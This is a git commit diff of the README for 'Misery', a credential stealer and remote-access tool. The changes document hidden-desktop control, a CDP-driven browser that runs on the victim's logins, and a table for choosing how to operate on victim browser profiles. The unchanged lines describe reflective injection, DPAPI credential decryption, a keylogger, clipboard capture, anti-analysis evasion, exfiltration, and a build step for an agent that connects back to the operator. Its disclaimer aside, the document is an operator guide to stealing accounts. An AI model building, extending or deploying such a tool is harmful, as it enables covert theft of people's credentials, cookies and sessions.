docs: correct session table for CDP-rendered interactive browser; tidy hvnc code

This commit is contained in:
JYenn
2026-08-15 05:18:14 +01:00
parent c17155dc7f
commit 61b5cd0caf
+14 -10
View File
@@ -9,6 +9,7 @@
HVNC inspired by Ek0m's research, rebuilt on top of the Misery stealer.
- Hidden desktop (`hvnc start`): run any app on a hidden desktop and watch it live
- Interactive browser (`hvnc launch chrome`): full Chromium with the victim's logins, driven over CDP in the view
- Ghosted browser (`ghost <url>`): real Chrome/Edge session using the victim's cookies and logins
- Credential and app-session harvesting (Misery stealer pipeline)
- Browsers: Chrome, Edge, Brave, Opera, Opera GX, Firefox
@@ -27,7 +28,7 @@ Educational/research use only. Run only on systems you own or have written permi
## Operator view
The console's live hidden-desktop feed, streamed from the agent and rendered in the view window:
The console's live session feed (hidden desktop, or CDP-rendered browser while one is launched), streamed from the agent and rendered in the view window:
<p align="center">
<img src="MiseryLiveOperatorView.png" alt="Misery operator view" width="1000">
@@ -41,13 +42,16 @@ The console's live hidden-desktop feed, streamed from the agent and rendered in
## Which session to use
| | Ghosted session (`ghost <url>`) | Hidden desktop (`hvnc start`) |
|---|---|---|
| Profile | Snapshot copy of the victim's profile (deleted on stop) | Victim's real, live profile |
| Browser | Chrome / Edge only | Any app + full desktop (explorer + Start menu) |
| Collides with open browser? | No | Yes (profile lock / two-instance conflict) |
| Writes back to profile? | No | Yes (history, cookies, sign-outs persist) |
| Use when | Authenticated browser session only | Full hidden desktop or non-browser app |
| | Ghost automation (`ghost <url>`) | Hidden desktop (`hvnc start`) | Interactive browser (`hvnc launch`) |
|---|---|---|---|
| What you see | nothing, it runs scripted over CDP | full desktop capture (GDI apps) | page viewport, CDP-rendered |
| Profile | snapshot copy of the victim's profile (deleted on stop) | apps only; browsers get a snapshot copy | snapshot copy (deleted on stop) |
| Browsers | Chrome / Edge | any app | Chrome / Edge / Brave / Opera via CDP; Firefox & IE on the desktop |
| Collides with open browser? | No (its own copy) | No (browsers use a copy) | No (its own copy) |
| Writes back to profile? | No | No (only the copy) | No (only the copy) |
| Use when | you want the logged-in session handled without watching | you need the whole desktop or a non-browser app | you want to browse logged-in sites interactively |
Chrome-family browsers render through DirectComposition, which GDI capture cannot read on a hidden desktop, so `hvnc launch` of a Chromium browser switches the view to CDP-driven frames (in-process screenshots + trusted input). The view shows the page viewport, not the tab strip or address bar.
The stealer runs inside the browser via reflective injection when possible (passes process checks). Falls back to offline DPAPI in the agent process otherwise. Everything goes over one encrypted channel: agent streams frames/results, console forwards input and writes exfil to disk.
@@ -66,7 +70,7 @@ python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent
.\build\agent.exe # connects
```
Console is a terminal (`misery > ` prompt). Live view window opens for the hidden-desktop feed; input is forwarded.
Console is a terminal (`misery > ` prompt). A live view window opens for the session feed (hidden desktop, or the browser view when `hvnc launch` starts Chrome/Edge/Brave/Opera); input is forwarded.
Commands: `steal`, `hvnc start | stop | launch [path]`, `ghost <url> | stop`, `keylog`, `clip`, `clear`, `exit` (type `help` for full list).
@@ -151,7 +155,7 @@ Tested on Chrome/Edge, Windows 10/11 x64.
- `src/stealer` – Misery-derived sources
- `src/hvnc` – hidden-desktop session
- `src/ghost` – ghosted browser session
- `src/browser` – CDP client that drives the ghost browser (Page/Input over WebSocket)
- `src/browser` – CDP client that drives the ghost browser and the interactive browser view (Page/Input over WebSocket)
- `src/rat` – keylogger + clipboard
- `src/transport` – encrypted TCP framing, HTTPS beacon carrier, compression
- `src/evasion` – indirect syscalls, anti-analysis, helpers